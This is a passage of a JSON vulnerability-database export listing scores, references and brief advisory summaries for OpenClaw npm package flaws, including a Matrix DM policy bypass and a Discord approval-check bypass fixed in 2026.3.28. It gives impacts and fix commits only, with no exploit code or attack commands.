reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33577","reference_id":"","reference_type":"","scores":[{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02402","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02398","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00015","scoring_system":"epss","scoring_elements":"0.03525","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33577"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/4d7cc6bb4fac68b5a5fadd1c5a23168281221f34","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/4d7cc6bb4fac68b5a5fadd1c5a23168281221f34"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2x4x-cc5g-qmmg","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2x4x-cc5g-qmmg"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33577","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33577"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-insufficient-scope-validation-in-node-pair-approve","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:41Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-insufficient-scope-validation-in-node-pair-approve"},{"reference_url":"https://github.com/advisories/GHSA-2x4x-cc5g-qmmg","reference_id":"GHSA-2x4x-cc5g-qmmg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2x4x-cc5g-qmmg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-33577","GHSA-2x4x-cc5g-qmmg"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u1ru-vdfp-x3hu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90842?format=json","vulnerability_id":"VCID-u6hw-ffpj-4yd9","summary":"OpenClaw: Matrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers\n## Summary\n\nMatrix Verification Notices Bypass Matrix DM Policy and Reply to Unpaired DM Peers\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nMatrix verification notices previously bypassed DM access checks and could reply to peers that were unpaired or otherwise outside the allowed DM policy. Commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2` gates verification notices on DM access before sending.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`.\n\n## Fix Commit(s)\n\n- `2383daf5c4a4e08d9553e0e949552ad755ef9ec2`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35647","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12423","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12387","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12424","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35647"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"}],"url":"https://github.com/openclaw/openclaw/commit/2383daf5c4a4e08d9553e0e949552ad755ef9ec2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-9wqx-g2cw-vc7r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35647","reference_id":"CVE-2026-35647","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35647"},{"reference_url":"https://github.com/advisories/GHSA-9wqx-g2cw-vc7r","reference_id":"GHSA-9wqx-g2cw-vc7r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-9wqx-g2cw-vc7r"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices","reference_id":"openclaw-direct-message-policy-bypass-via-verification-notices","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-10T17:21:05Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-direct-message-policy-bypass-via-verification-notices"}],"fixed_packages":[],"aliases":["CVE-2026-35647","GHSA-9wqx-g2cw-vc7r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u6hw-ffpj-4yd9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91801?format=json","vulnerability_id":"VCID-u9cw-crg5-1kbs","summary":"OpenClaw: Discord text `/approve` bypasses `channels.discord.execApprovals.approvers` and allows non-approvers to resolve pending exec approvals\n## Summary\n\nDiscord text approval commands resolved pending exec approvals without honoring the configured approver allowlist.\n\n## Impact\n\nA Discord user who was allowed to send commands but was not in the approver list could still approve pending host execution.\n\n## Affected Component\n\n`extensions/discord/src/exec-approvals.ts, src/auto-reply/reply/commands-approve.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `355abe5eba` (`Discord: enforce approver checks for text approvals`).","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41303","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23525","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23462","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23509","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41303"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/355abe5eba28012e6a95b9923a32831fcf870344","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/355abe5eba28012e6a95b9923a32831fcf870344"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:44Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-98hh-7ghg-x6rq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41303","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41303"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-text-approval-commands","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-21T13:35:44Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-discord-text-approval-commands"},{"reference_url":"https://github.com/advisories/GHSA-98hh-7ghg-x6rq","reference_id":"GHSA-98hh-7ghg-x6rq","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-98hh-7ghg-x6rq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"